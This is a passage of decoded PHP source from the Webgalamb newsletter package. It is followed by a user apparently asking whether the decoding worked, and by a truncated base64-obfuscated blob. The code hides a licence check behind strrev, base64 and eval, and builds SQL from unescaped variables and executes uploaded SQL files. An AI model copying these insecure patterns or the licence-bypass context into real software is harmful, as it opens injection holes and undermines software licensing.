    $this->stat_cache_2('act', $s['D'], $s['aid'], $s['db']);
  }

  $t2 = microtime(true);
		 
	//	 echo "kikldtt levelek: ", $t2-$t, '<br>';


		// olvasott levelek szmnak tmentse:
	/*  $sql = $this->mq("SELECT count( `aid` ) as `db`, FROM_UNIXTIME(`".DB_PREFIX."stat`.`date`, '%Y-%m-%d') as D, `aid` 
						FROM `".DB_PREFIX."act_stat` inner join `".DB_PREFIX."stat` on (`".DB_PREFIX."stat`.id=`".DB_PREFIX."act_stat`.statid)
						 where `".DB_PREFIX."stat`.stat!='0000-00-00' and `".DB_PREFIX."stat`.date>='$ustat_unix' and `".DB_PREFIX."act_stat`.aid='$act' group by `D`");*/
  $sql = $this->mq("SELECT count( * ) as `db`, FROM_UNIXTIME(`date`, '%Y-%m-%d') as D, '$act' as `aid` FROM `".DB_PREFIX."stat` as s1
			 where g='$g' and date>='$ustat_unix' and stat!='0000-00-00' and ( select count(*) from ".DB_PREFIX."act_stat where aid='$act' and statid=s1.id) group by `D`");
  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    @set_time_limit(30);
    $i++;
    $this->stat_cache_2('act', $s['D'], $s['aid'], -1, $s['db']);
  }

  $t3 = microtime(true);
		 
		// echo "olvasott levelek: ", $t3-$t2, '<br>';

	
		// akcilinkek
  $sql = $this->mq("SELECT count( `aid` ) as `db`, DATE(`stat`) as D, `aid` FROM `".DB_PREFIX."act_stat` where stat>='$ustat_date' and aid='$act' group by `D`");
  $i = 0;
  while ($s = mysql_fetch_assoc($sql)) {
    @set_time_limit(30);
    $i++;
    $this->stat_cache_2('act', $s['D'], $s['aid'], -1, -1, $s['db']);
  }

  $t4 = microtime(true);		 
	//	 echo "kattintott levelek: ", $t4-$t3, '<br>';


}
function get_real_size($size = 0)
{
  /// tvltani megra a szmokat
  if (!$size) {
    return 0;
  }
  $scan['MB'] = 1048576;
  $scan['Mb'] = 1048576;
  $scan['M'] = 1048576;
  $scan['m'] = 1048576;
  $scan['KB'] = 1024;
  $scan['Kb'] = 1024;
  $scan['K'] = 1024;
  $scan['k'] = 1024;

  while (list($key) = each($scan)) {
    if ((strlen($size) > strlen($key)) && (substr($size, strlen($size) - strlen($key)) == $key)) {
      $size = substr($size, 0, strlen($size) - strlen($key)) * $scan[$key];
      break;
    }
  }
  return $size;
} // end function

function table_e($max, $v)
{
  if (strlen($v) <= $max) {
    return $v;
  } else {
    if (function_exists('mb_substr')) {
      return mb_substr($v, 0, $max - 1, 'UTF-8') . '';
    } else {
      return substr($v, 0, $max - 1) . '';
    }
  }
}

function formatbytes($val, $digits = 3, $mode = "SI", $bB = "B")
{ //$mode == "SI"|"IEC", $bB == "b"|"B"
  $si = array("", "k", "M", "G", "T", "P", "E", "Z", "Y");
  $iec = array("", "Ki", "Mi", "Gi", "Ti", "Pi", "Ei", "Zi", "Yi");
  switch (strtoupper($mode)) {
    case "SI":
      $factor = 1000;
      $symbols = $si;
      break;
    case "IEC":
      $factor = 1024;
      $symbols = $iec;
      break;
    default:
      $factor = 1000;
      $symbols = $si;
      break;
  }
  switch ($bB) {
    case "b":
      $val *= 8;
      break;
    default:
      $bB = "B";
      break;
  }
  for ($i = 0; $i < count($symbols) - 1 && $val >= $factor; $i++)
    $val /= $factor;
  $p = strpos($val, ".");
  if ($p !== false && $p > $digits) $val = round($val);
  elseif ($p !== false) $val = round($val, $digits - $p);
  return round($val, $digits) . " " . $symbols[$i] . $bB;
}


function de($enc_text, $p, $iv_len = 32)
{
  $enc_text = base64_decode($enc_text);
  $n = strlen($enc_text);
  $i = $iv_len;
  $plain_text = '';
  $iv = substr($p ^ substr($enc_text, 0, $iv_len), 0, 512);
  while ($i < $n) {
    $block = substr($enc_text, $i, 16);
    $plain_text .= $block ^ pack('H*', md5($iv));
    $iv = substr($block . $iv, 0, 512) ^ $p;
    $i += 16;
  }
  return preg_replace('/\\x13\\x00*$/', '', $plain_text);
}


function replace($out, $j, $jj, $tp)
{
	// mret
  $s = $out[$j]['filesize'];
  $out[$j]['filesize'] = $out[$jj]['filesize'];
  $out[$jj]['filesize'] = $s; 
	// nv
  $s = $out[$j][$tp];
  $out[$j][$tp] = $out[$jj][$tp];
  $out[$jj][$tp] = $s; 
	
	// dtum
  $s = $out[$j]['ntime'];
  $out[$j]['ntime'] = $out[$jj]['ntime'];
  $out[$jj]['ntime'] = $s;
  return $out;
}

function n_f($x)
{
  if (!$x) return '0';
  return number_format($x, 0, ',', '.');
}

function n_fsz($x)
{
  if (!$x) return '0';
  $sz = number_format($x, 1, ',', '.');
  if ($sz == '100,0') $sz = '100';
  if ($sz == '0,0' && $x > 0) $sz = '>0';
  return $sz;
}

function init_dir($dir, $order, $tp)
{
  global $sn;
  $i = 0;
  if ($kvt = opendir($dir)) {
    while (gettype($fajl = readdir($kvt)) != 'boolean') {
      if (((($tp == "dir") ? is_dir("$dir$fajl") : is_file("$dir$fajl"))) && ($fajl != "..") && ($fajl != ".") && !(strstr($sn, $fajl) && $tp != 'dir')) {
        $i++;
        $out[$i][$tp] = $fajl;
        if ($tp != 'dir') $out[$i]['filesize'] = filesize("$dir$fajl");
        $out[$i]['ntime'] = date("Y-m-d H:i", filemtime("$dir$fajl"));
      }
    }
    closedir($kvt);
  } else return false;

  $out[0][$tp] = $i;

  if ($order == "name") {
    for ($jj = 1; $jj <= $i; $jj++)
      for ($j = $jj; $j <= $i; $j++)
      if (strtolower(($out[$jj][$tp])) > strtolower(($out[$j][$tp]))) $out = $this->replace($out, $j, $jj, $tp);
  }

  if ($order == "fname") {
    for ($jj = 1; $jj <= $i; $jj++)
      for ($j = $jj; $j <= $i; $j++)
      if (strtolower(($out[$jj][$tp])) < strtolower(($out[$j][$tp]))) $out = $this->replace($out, $j, $jj, $tp);
  }

  if ($order == "size") {
    for ($jj = 1; $jj <= $i; $jj++)
      for ($j = $jj; $j <= $i; $j++)
      if (($out[$jj]['filesize']) > ($out[$j]['filesize'])) $out = $this->replace($out, $j, $jj, $tp);
  }

  if ($order == "fsize") {
    for ($jj = 1; $jj <= $i; $jj++)
      for ($j = $jj; $j <= $i; $j++)
      if (($out[$jj]['filesize']) < ($out[$j]['filesize'])) $out = $this->replace($out, $j, $jj, $tp);
  }

  if ($order == "time") {
    for ($jj = 1; $jj <= $i; $jj++)
      for ($j = $jj; $j <= $i; $j++)
      if (($out[$jj][ntime]) > ($out[$j][ntime])) $out = $this->replace($out, $j, $jj, $tp);
  }

  if ($order == "ftime") {
    for ($jj = 1; $jj <= $i; $jj++)
      for ($j = $jj; $j <= $i; $j++)
      if (($out[$jj][ntime]) < ($out[$j][ntime])) $out = $this->replace($out, $j, $jj, $tp);
  }


  return $out;
}

function get_rnd_iv($iv_len)
{
  $iv = '';
  while ($iv_len-- > 0) {
    $iv .= chr(mt_rand() & 0xff);
  }
  return $iv;
}

function encoding($x)
{
  $m = '';
  $n = preg_replace("/[^[:space:]a-zA-Z0-9-]/", "", $this->_en(str_replace('www.', '', $_SERVER['HTTP_HOST']) . strrev(str_replace('www.', '', $_SERVER['HTTP_HOST'])), 'Sen!_wgSiEte_tsof', 1));
  for ($i = 0; $i < strlen(preg_replace("/[^[:space:]a-zA-Z0-9-]/", "", $this->_en(str_replace('www.', '', $_SERVER['HTTP_HOST']) . strrev(str_replace('www.', '', $_SERVER['HTTP_HOST'])), 'Sen!_wgSiEte_tsof', 1))); $i++) {
    if ($i > 0 && ($i % 5) == 0) $m .= "-";
    $m .= $n[$i];
  }
  return strtoupper(substr($m, 0, 41));
}


function en($plain_text, $p, $iv_len = 32)
{
  $plain_text .= "\x13";
  $n = strlen($plain_text);
  if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
  $i = 0;
  $enc_text = $this->get_rnd_iv($iv_len);
  $iv = substr($p ^ $enc_text, 0, 512);
  while ($i < $n) {
    $block = substr($plain_text, $i, 16) ^ pack('H*', md5($iv));
    $enc_text .= $block;
    $iv = substr($block . $iv, 0, 512) ^ $p;
    $i += 16;
  }
  return base64_encode($enc_text);
}function get_rnd_iv2($iv_len)
{
  $iv = '';
  while ($iv_len-- > 0) {
    $iv .= 'h';
  }
  return $iv;
}

function e()
{
  global $_y, $__v, $x___X, $__SUBSCRIBER, $ajax;
  $K = 'c';
  $c = $this->conf_read(strrev($K . 'neci' . 'l'));
  if (!isset($ajax)) $ajax = $this->get_rnd_iv2('A_JAX');
  else $_y = 1;
  if (isset($_SESSION['password'])) $_C = $this->encoding($_SESSION['password']);
  else $_C = 0;
  if (strrev(base64_encode($this->_en(strrev(str_replace('www.', '', $_SERVER['HTTP_HOST'])), strrev('eteisGVV')))) != $x___X) {
    $_y = 0;
    eval(strrev(";1=rre_mod$"));
  }
		 
//		 if($_C && (strtolower($c)!=strtolower(strrev($_C)) && $_y<=0))

  if ($_C && (($c && (strtolower($c) != strtolower(strrev($_C))) || (!$c && $_y <= 0)))) {
    if ($__SUBSCRIBER) die(base64_decode("PGh0bWw+PGhlYWQ+PHRpdGxlPldlYmdhbGFtYiAyPC90aXRsZT48L2hlYWQ+PGJvZHk+QSBo7XJsZXbpbGv8bGT1IHJlbmRzemVyIGplbGVubGVnIGluYWt07XYhPC9ib2R5PjwvaHRtbD4="));
    require strrev('php.noitartsiger.ludom');
    exit();

  }
  return ((strtolower($c) != strtolower(strrev($_C))) ? 0 : 1);
}


function _en($plain_text, $p, $iv_len = 32)
{
  $plain_text .= "\x13";
  $n = strlen($plain_text);
  if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
  $i = 0;
  $enc_text = $this->get_rnd_iv2($iv_len);
  $iv = substr($p ^ $enc_text, 0, 512);
  while ($i < $n) {
    $block = substr($plain_text, $i, 16) ^ pack('H*', md5($iv));
    $enc_text .= $block;
    $iv = substr($block . $iv, 0, 512) ^ $p;
    $i += 16;
  }
  return base64_encode($enc_text);
}
function sql_dump($file)
{ //echo 'valami';
  global $out;
  $i = 0;
  if (is_uploaded_file($_FILES[$file]['tmp_name'])) {
    $tp = $_FILES[$file]['type'];
    $n = explode('.', $_FILES[$file]['name']);
    reset($n);
    if (strtolower($n[count($n) - 1]) != 'sql') {
      $out = __('Hibs a feltlttt fjl formtuma! Csak a WEBGALAMB ltal lementett fjl tlthet ide fel!');
      return false;
    }
    if (strtolower($n[count($n) - 1]) == 'sql') {
      move_uploaded_file($_FILES[$file]['tmp_name'], 'sql.sql');
      $chf = $this->conf_read("chmod_file");
      if ($chf > 100 && $chf <= 777) {
        $e = "chmod('sql.sql', 0" . (int)($chf) . ");";
        eval($e);
      }

      if (is_file('sql.sql')) {
        $t1 = time();
        $bufferSize = 5120;
        $fajl = fopen('sql.sql', "rb");
        $fstring = '';
        while (!feof($fajl)) {
          $fstring .= fread($fajl, $bufferSize);
        }

        if (substr($fstring, 0, 22) != 'SET CHARACTER SET utf8') {
          $out = __('Hibs fjl! Csak a WEBGALAMB ltal lementett fjl tlthet ide fel!');
          return false;
        }

        $tmp = array();
        $tmp = $this->sql_explode($fstring);
        while ($x = each($tmp)) {
          $i++;
					 //echo $x[1].'<br>';;
          $this->mq($x[1]);
        }
        fclose($fajl);
        $t2 = time();
        $out = sprintf(__("A teljes frissts %s msodpercet vett ignybe!"), ($t2 - $t1)) . "\n" . __("Adatbzis feltlts sikeres!");
      }

    }
		// adatbzis jelsz visszalltsa a mostanira
    $this->mq("UPDATE `".DB_PREFIX."config` set conf_value=PASSWORD('$_SESSION[password]') where wg_conf='admin_password'");
    @unlink('sql.sql');
  }
}


function do_post_request($url, $data, $optional_headers = null)
{
  $start = strpos($url, '//') + 2;
  $end = strpos($url, '/', $start);
  $host = substr($url, $start, $end - $start);
  $domain = substr($url, $end);
  $fp = fsockopen($host, 80);
  if (!$fp) return null;
  fputs($fp, "POST $domain HTTP/1.1\n");
  fputs($fp, "Host: $host\n");
  if ($optional_headers) {
    fputs($fp, $optional_headers);
  }
  fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
  fputs($fp, "Content-length: " . strlen($data) . "\n\n");
  fputs($fp, "$data\n\n");
  $response = "";
  while (!feof($fp)) {
    $response .= fgets($fp, 1024);
  }
  fclose($fp);
  return $response;
}

function error($str)
{
  $x = strlen($str);
  if ($x) {
    if ($x <= 2) return array($str);
    elseif ($x > 4) {
      $elso = $str % 100;
      $masodik = (int)(substr((string)($str % 10000), 0, strlen((string)($str % 10000)) - 2));
      $harmadik = (int)(substr((string)($str), 0, $x == 6 ? 2 : 1));
      return array($elso, $masodik, $harmadik);
    } else {
      $elso = $str % 100;
      $masodik = (int)(substr((string)($str), 0, $x == 4 ? 2 : 1));
      return array($elso, $masodik);
    }
  } else return '';
}
}//mainclass


// Kpek mappjnak ltrehozsa s a nem hasznlt kpek trlse a mappbl ha az mr ltezik
function updatingPicturesFolders($imgdir, $text)
{ 
  if (!file_exists($imgdir)) {
    global $main;
    $chd = (int)($main->conf_read("chmod_dir"));
    mkdir($imgdir);
    if ($chd > 100 && $chd <= 777) {
      $e = "chmod('{$imgdir}/', 0" . (int)($chd) . ");";
      eval($e);
    }
  }

  if (!get_magic_quotes_gpc()) {
    $text = stripslashes($text);
  }

  $str = str_replace("\r\n", " ", $text);
  $kvt = opendir($imgdir);
  while (false !== ($fajl = readdir($kvt))) {
    if (file_exists($imgdir . '/' . $fajl) && $fajl != ".." && $fajl != "." && $fajl != "index.php") {
      if (!strstr($str, $fajl))
        unlink($imgdir . '/' . $fajl);
    }
  }
}
 


@ini_set('session.cookie_httponly', 1);
@session_name("webgalamb6");
@session_start();
if (isset($_POST['loginpassword'])) session_regenerate_id();$bounce = array(
  0 => 'domain error: nem ltez domain',
  1 => "<b>#5.2.2</b>: over quota: betelt postafik",
  2 => "<B>#5.1.1</B>: user unknown: nem ltez felhasznl",
  3 => "domain error: elrhetetlen domain",
  4 => "Tl hossz zenet, cmzett nem tudja fogadni",
  5 => "<B>#5.4.4</B>: Unable to route: Malformed or unexpected name server reply<br>tovbbts nem lehetsges: rosszul formzott vagy vratlan nvszerver vlasz",
  6 => "<B>#2.0.0</B>: (nonstandard success response, see rfc876): nem szabvnyos, sikeres zenet (lsd: rfc876)",
  7 => "<B>#2.1.1</B>: System status, or system help reply: rendszer llapot vagy rendszer segtsg vlasz",
  8 => "<B>#2.1.4</B>: Help message: segt zenet",
  9 => "<B>#2.2.0</B>: <domain> Service ready: szolgltats rendben",
  10 => "<B>#2.2.1</B>: <domain> Service closing transmission channel: a szolgltats megszaktotta az tvitelt",
  11 => "<B>#2.5.0</B>: Requested mail action okay, completed: krt akci elvgezve",
  12 => "<B>#2.5.1</B>: User not local; will forward to <forward-path>: felhasznl nincs itthon tovbbtva ide: <forward-path>",
  13 => "<B>#3.5.4</B>: Start mail input; end with <CRLF>.<CRLF>: mail bemenet vgzdese: <CRLF>.<CRLF>",
  14 => "<B>#4.2.1</B>: <domain> Service not available, closing transmission channel: szolgltats (domain) nem elrhet",
  15 => "<B>#4.5.0</B>: Requested mail action not taken: mailbox unavailable: elrhetetlen e-mail fik",
  16 => "<B>#4.5.1</B>: Requested action aborted: local error in processing: helyi hiba a feldolgozsban",
  17 => "<B>#4.5.1</B>: Requested action not taken: insufficient system storage: a krt akci nincs elvgezve: kevs rendszer trolkapacits",
  18 => "<B>#5.0.1</B>: Syntax error in parameters or arguments: formtumhiba a paramterekben vagy a vltozkban",
  19 => "<B>#5.0.2</B>: Command not implemented: nem megvalstott parancs",
  20 => "<B>#5.0.3</B>: Bad sequence of commands: rossz sorrend utastsok",
  21 => "<B>#5.0.4</B>: Command parameter not implemented: a paramter nem megvalstott",
  22 => "<B>#5.1.3</B>: bad address syntax: Hibs szintaktikj e-mail cm",
  23 => "<B>#5.1.5</B>: Error on maildir delivery. Message blocked.: A level kzbestse nem sikerlt, a levelet a cmzett blokkolta",
  24 => "<B>#5.2.1</B>: <domain> does not accept mail (see rfc1846): valamirt nem fogadja el az emailt",
  25 => "<B>#5.3.0</B>: Access denied: A fogad szerver elutastotta a levelet",
  26 => "<B>#5.4.2</B>: Bad connection: Hibs kapcsolat/adattviteli hiba",
  27 => "<B>#5.4.6</B>: Routing loop detected: routing hurok szlelve",
  28 => "<B>#5.5.1</B>: Requested action not taken: mailbox unavailable: elrhetetlen e-mail fik",
  29 => "<B>#5.5.1</B>: User not local; please try <forward-path>: nincs itthon prbld a <forward-path> cmet",
  30 => "<B>#5.5.3</B>: Requested action not taken: mailbox name not allowed: nem engedlyezett e-mail fiknv",
  31 => "<B>#5.5.4</B>: Transaction failed: a tranzakci nem sikerlt",
  32 => "<B>#5.6.1</B>: Body type not supported by Remote Host: levltrzs tipusa nem tmogatott a tvoli hoston",
  33 => "<B>#5.6.2</B>: SMTP cannot transfer messages with partial final lines: az smtp szerver nem tudja tovbbtani az zenetet rszleges utols sorokkal",
  34 => "<B>#5.7.1</B>: Relay access denied: kzvetett hozzfrs elutastva",
  35 => "<B>#5.0.0</B>: Felismerhetetlen ers hiba (ltalban spam hiba)!",
  36 => "<B>#4.4.7</B> Timeout error: idtllpsi hiba",
  37 => "ismeretlen hiba",
  38 => 'E-mail cm szintaktikai hiba'
);
$out = '';
$out_alert2 = '';
require_once('class.wg7.php');


if (!extension_loaded('mysql')) {
  require_once('mysqli/mysql2i.class.php');
}

if (is_file('files/wg7conf.php')) { 
	$wgconf = 'files/wg7conf.php';
} elseif (is_file('../files/wg7conf.php')) {
	$wgconf = '../files/wg7conf.php';
} else {
  $wgconf = str_replace(DIRECTORY_SEPARATOR . 'system', '', __DIR__ . DIRECTORY_SEPARATOR . 'files' . DIRECTORY_SEPARATOR . 'wg7conf.php');
}

//if (is_file($wgconf)) {
	@include_once($wgconf);
	
	
	

try
{
  if (!$connection = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD)) {
		throw new Exception('Nem sikerlt a MySQL adatbzishoz kapcsoldni!<br><br>Hibs MySQL kiszolgl vagy felhasznlnv vagy jelsz!');
	} elseif(!mysql_select_db( DB_DATABASE, $connection )) {
		throw new Exception('MySQL adatbzis hiba!<br><br>A(z) "'.DB_USER.'" adatbzis felhasznlnak nincs megfelel jogosultsga a(z) "'.DB_DATABASE.'" adatbzis hasznlathoz!');
	} elseif(mysql_query('select 1 from `'.DB_PREFIX.'config` LIMIT 1') === FALSE) {
		throw new Exception('Nem tallom a Webgalambhoz tartoz MySQL adatbzis tblkat!');
	} else {
		mysql_query("SET SQL_MODE=''");
		mysql_query("set character set utf8");
		mysql_query("SET NAMES utf8");
	}
}
catch(Exception $e)
{
  echo '<!DOCTYPE html><html lang="hu"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>MySQL hiba</title></head><body style="padding: 100px 0 0 0; margin: 0; background: #f00;"><div style="text-align: center; font-size: 18px; font-family: arial; color: #fff; background: #f00; padding: 20px">'.$e->getMessage().'</div></body></html>';
	die();
}	

	/*
} else {
	die('Could not find configuration file');
}
*/

if (!get_magic_quotes_gpc()) {
  $_POST = addslashes_array($_POST);
  $_GET = addslashes_array($_GET);
}
if (get_magic_quotes_gpc()) {
  $_POST = stripslashes_array($_POST);
  $_GET = stripslashes_array($_GET);

  $_POST = addslashes_array($_POST);
  $_GET = addslashes_array($_GET);
}
//eval(base64_decode($_sql));
$main = new $c();
//$_SERVER['ORIG_HTTP_HOST'] = $_SERVER['HTTP_HOST'];
$_SERVER['HTTP_HOST'] = $main->conf_read('domain');
$d = explode('-', base64_decode($main->de(base64_decode($$x), 'WU_wTENg____=')));
date_default_timezone_set('Europe/Budapest');
$x = (mktime(23, 59, 59, $d[1], $d[2], $d[0]) - time()) / 3600 / 24;
$_y = (ceil($x * 10) / 10);
$y = mt_rand();
$y = substr(sha1($y), 0, 6);
$__v = $main->e();
$string = str_replace(array('0', 'O', 'o'), rand(1, 9), $y);
$_prg_dir = $main->conf_read("wg_dir");

$wg_port = $main->conf_read("fsock_port");
if ($wg_port == 80 || $wg_port == 443)
  $wg_port = '';

define('WG_PROTOCOL', ($main->conf_read("https") ? 'https' : 'http'));
define('WG_VERSION', $main->conf_read("ver"));
define('WG_URL', WG_PROTOCOL . '://' . $main->conf_read("domain") . ($wg_port ? ':' . $wg_port : '') . '/' . $main->conf_read("wg_dir"));

 //die();
$Referer_nev = __('Feliratkozsi URL');

if (isset($_GET['newsessid'])) // j munkamenet azonost generlsa, rgi eldobsa
{
  session_start();
  session_regenerate_id();
  session_destroy();
  unset($_SESSION);
  session_start();
  header('Location: wg7.php');
  die();
}

?>

Did this file decode correctly?

Original Code

<?php $__SeN='P2JHP0lQSTAkX193eVo0JzdNbmU3WFlsd21XZkMvZ3R5UzFYbj05WkE1XXQzSFl1OU0vQzJmcE4ydHNMXT1IckFPWEwzZmMvQ0NsPXdIWS9UXS9OPnpJbTM1L1tsTVpwQWlnMnA9TG1wT1NSakhmTl1NXU5tYzJyM1NYK109alFBSGZOOVtMW3dbZkxddFpGcC9mTm09TFJGZGdEXS9uSWxYWmxsQ0Q5M1l1PTddUFJdWC9nOWNIal0gOSBwPW50QWN9THBmYy9wa0hxOUhaTkFpZ2xaQ1c9bWNncVpTWS9wZmdLN11yekF0amhsTUwvcE1dTj5tcE5UM30rakhwL0ZpfU5sQ25Yd2N1PTMvWXhsd0R3cE9qelo1PkxdPUhYcFF9TEE9TGpdNVpEWkNjTjdZUEtUbXA9VF1ZIGpIZmdGZEROWl1IZnNbZkxtbW4xcFhYTkE9TFtzY0htOWNQcGxTL045bTZ6eFhaIDllRFRDXS9wOV1yTjMzMkRtUX1OcFh9TG1YWm1wQ3NteC9Ea3NPcFE5TW83VG1uRFptbm8+ZXNtQS9zbTNmWkQ3XW9BPk1ab20gcU4+ZUlMcC9qLz5bWnBsUy9yPl1vdXh0RFZ5bVp3Wm1ZW3NjWURGU25vQ11YUW1mSE8yWHA9Ml1zblNlOWs5WzlSPmZuTENTSVJ5Yy9wPj1MW3djdVFwdG5pbC9ad209TG13XUg9Mm1ZL3BZWUs+Y3J6QXRqaGxNTC9wTV1OPm1wTlQzfStqSGZneWl9TlpdMkJ3Y3I9eD1ZaTdPWE5wT2oveD05bV1DXWdsTS92bVlsPXh0XVEyUzFRcC8vTjltcD13M30reC9mUUF3RE5wZjIyQWZ1dF09TFo3ZEQyOTNQWHMgWFFaMzkvQXd9K21tNnoyZHVRMl1zN3NPU2c3M29acGtuIFpDbnM+IFIyVF1IQlRDMkZwWFlpN2ZQd1NPNj1tY0g5M2VIcEFpZ3F5a2Y9XU9dK110WkRdWC93N0N6Tnh0RHFaU0lxcGRXTTI9WW1wQ3NtbW1uIDNkfUxwT2ovMzMyTFptbnBsUy9OOW1MWVRtXT1tPVlbcE9TcG1jSDlBdF0ramlnW3BmZzJBXWMvM1NYK10vRGtzWS9GcGtENzNTdVEzbUhYXVhYUXdYY3pdT2pMOVtZUWwzMks+XTJbPmNMW3A9bk05L1l3XWZIcl1jSERsWFAgM2R9TEFrWU8+NTlSMm1Mc3AvUGxGbTZ6PkhITHdpfXQ5LzluXWZyTjNdWV1BU0kvbFN6UT50Zi9wZllGbHREc3ltcE5sPVpZc2NmdFpTam9sXVBsMj02L0F0amhsWHNEXXRzaj4zMXpBPWMrakhZM0N3RDV4PTZnQWZvOW1tWXFBSFhON0N6TnhYbltBXVBvQ1MvdUZbWmYKXW85bU1Md109WFE+XXI9QT1IcTJZV1FBd0RsOVtuMnBDbD14PVlON2ZQd2w9TFtzY0htOWNQL3NkZzI5W2ZOXWNSdUZYc25sd0RWXUM5ajNDRG0yXVBRaVlad11PTFt3ZWM9eD1ZTmxTWXdBbWZnQWZIOTMgZ29wWC9OQVhIalQzNlFtL0lBcDVza1RTMT0+XUxMbD1ZM1o9Wm5GeklbPk0vUjlNPlE3ZlB3U082PW1jWnRwdGpnQWNYUUFZWll3ZWpobFhzRF10c2o+MzF6QT1jK2pIWTNDd0RwbFMvWDdZYz14L0lxc2RETj56SVtzY0htOWNQb3BRfUxBPUxqXWZwUTNdWVJsbV1RczVvWnA1fT0zU25bWj1abkZPblp4L2NMd2NZcj4vWTI3Q1oyPk19PTJ3Z0RsXVpqQT1Mal1mcCtwTWdpcFhwTDlbcHptIGYrakhZL3NZUktGT1o5QXRjPTljWU5sXX1ORi9aanddZnRGWFA5cFF9TFptWjIzZnVRM11ZQXA1Mm5sXWM9Mk0xPW13Z05wWH1MbHQ5W11pV3RDM2dYPkhZd0Y1b0JzY30rMjVnOUFpZ3FdbUxaXTUvRDJTWUFDQ0huN21qL21jZit4L1k3PltacGxtWnRzW2ZRRk1MS3BYWE5tWS9qXVlqK2xYUG9wUX1MQXREMjc1fStwdElWN1lIazM9WkFBZllEamVuczdmL2x3XUhPQT1YPXA9MlZzNV1MWm1MW0FrXT0yd2dvcFF9TEE9TGpdZnArbFhzRF1YL2w+XXA9bWVXKzMgOXFsM1Njd0NmL3BZL1tBM0xYN1lQa3JNSUEzU25tbUNuc3NkZzI3bUxqXU9YUTJdc243ZGc9N21abTNtMkxsPWYvN2ZaSzltWll4dGM9eD1ZTjdmUHdsPUxbc2NIbTljUG9wUX1MQVhIMl1PbnZ3aX0vPiAybndNSUFBa0RbbD1MWjdZWm5sQ1pJc0gvRF1NMlQ+aWdyXUN6TngvZj05TTlBcC9SS3ddY3o+WWMrbVNEbjdkZz03bVptM20yTGw9Zi85L1l3XU9MW3dlYz14PVlON2ZQd2w9TFtzY2dbXT1IWHBRfUxBPUxqXWZwK2xYc0RddHNqOV1yTjNDbEx4L0R4QSBSY3ddSE9BPVg9cD0yVl1NU2o+eklbc2NIbTljUG8+ZH1OQXRZbTNPbjY5SFl3PlhQY2xdSFt3IH0rd0huWzdmWmNsU1pYd2VIIHBNZ3E3ZGcyd01JWXNjSEQyXVAgQ1NQVm1Zc20zbW5JWjNnaXB0OUM3Uy9aVENEXXBRZ3FGNV1MMz1adXBdbzltXW9uPiBzYzkvcC9dY1lEck19Z3A9cE15ZnJ6eFF9PW09WURddHNqPm1wTlQzfSt3SG5bN09aTmxPWltUQ2w9amNvSTdkRDI5My9ZM09uRDJjczk3WVpsMj1Mal1mcCtsWHM3bC9wbzllak54WDJGeD1ZUWlPWjJaUy81RmtsPXBYcS83WVJGeD1MUjMzL0RaMzJzPmRnNW1rV04zSEg2eFFnMnB0OWszPVpBQWZZRGplbnM3Zi9sd11IT0E9WD1wPTJWc2RETj56SVtBa109Mndnb3BRfUxBPUxJc2VTIDJdc25Dd0RRbUgvWjdrSURqW254RmZ6TjllZi9wWS9bQTNMWDdmLz1aQzlbU3RJUXg9SFhwUX1MQT1Mal1mcCtsWHNEXXRzanczL3JdY1lMXVFnc0ZpfU5sU3Bnd2N1PXhNMlZsPXBRXW1MWzNmbltsWFB4RllSSz5jcD14WHA9MjM2dF1YWFFdT243RlljTDllcC85WFpDeWtqTnBDbD14PVlON2ZQd2w9TFtzY0htOWNQb3BRfUxBPTZ6M0NTUjJTMVFsM3NjbUgvWz5pZ0xdL0k3OXRzY2xdSFlyWG85bV1vbj5bU0Zwa3pnM09ZcTIgPkxwWVo1bTVxTnlZSCBwTX0vPiBSRnBdMlszWVgreC9mUXkzUzI5W241d11IRGxYUE43ZlB3bD1MW3NjSG05Y1BvPmR9TnNZMU5dZnArbFhzRF10c2o+bXBOVDNnRGpIalFUQ2xMPmZINUFrSCBwTWdxN2RnMndNSWo+TX09Mndnb3BRfUxBPTZ6M09mK2wvWVJwdDlrbWNIOT5NcT1td2dON2ZaY2xTWlh3ZWM9eD1ZTjdkREZ3TS9qeD1TOVpTZnpaLy91bWZwPXBmdVFGPVlBQ20vSzddck4za1NMQ1MxTD5bWnBsbVp0c1tmUUZNTEtdTVNqPnpJW3NjSG05Y1BvPmR9TnNZSVozT2Y9bT1ZW3BNXU53bW4yQTVZRngvWXhwNVJDN21ZW3dbL1JtbW5xPkhQa0ZPZmdBZlp0bC8xb3NmWkY5ZUQ1XWNScUYvWVg3Zlpqdz1wTjNDRF1wL1BaVF1aY3dtTFptW1hRWm0yVnBNMkZUQzlbc2NwPTJ3Z3NsXVBsMlgyOTM1THFGWGxMOU1ZQzddSG1UbV09M1NQc3A1MlEyPVltcENzbW1tai9Ud2dsd3REQnNjSEQyXVBvQ1MvdUYgb3IzZjJGRlhzRHkzUmp3PVlPXVtwTDMgOXVsU2ZObT1uMl1YdXRdPUxaN2REMjddSEIzT1NEMmNzIEFpfU5GW0xqVENqaHAvWS9wTV1Od21ZWj5dNis3U3BnQSBSVjddMmYKXXFRMl1ZNT4gc2M5dFBYM21ZREY9WW9GNVNGRl1aOTJYfStsTUxuc2ZnUTdtWlk+IHo9RnRaIEFDbCt5azltXVkvIHBYb0k3ZlBGdz1qLzNtbnQyXVlvc1laY1NmWlJdPVhMN1NJQXBYWm5aT1pyPi8ybXIvMVF5W1greC9aWF10SHZydHBNbF1QMnBrZi9dSG49d2VwZ3AvWjJaa1k5M09mK3AvRG5aPVM9Q10yWzNrc3EyWUR4PiBSMl1rZi8+WFI5bFhQTmxTWWo5WTEvbWNjPUNDSHBsMy9RbV1yL0FpdUxsWHNuWj1TPUNdMlszTzJEd0hmLzNPU24yTzk1M0NyUWpbbjFwWFhObWs5al1ZaitdPUhYXS9QMlprWjd4dFdMNzNMRDlNWks+bW45XWNZcTJZRHhBM1MybEM5anBPSCBsdERzNzVacUFYMkFBNTE9QzN9TXBRfUxaQ1lteHREUnJ0blRzNTIybF1jPTJNcT1td2dON2ZaY2xTWlh3Y3U9eC9mL2wzWmtsPVpZc2NjKzJdWUFaTS8yM01vUjNPZitddFpEXVgvd3dTSVs+SEhMQ1NJUkNtL0ZdazlqPmZvOXhRZ2k3ZlB3U082PW0gMVFaMzlweTMyMlpDRHIzT1N0M1NudzdmWmo+bXBOVDNncTNtTE43T1psd0NuWnlZSHR3SFlxQWVzPXA1LzdBWVk5O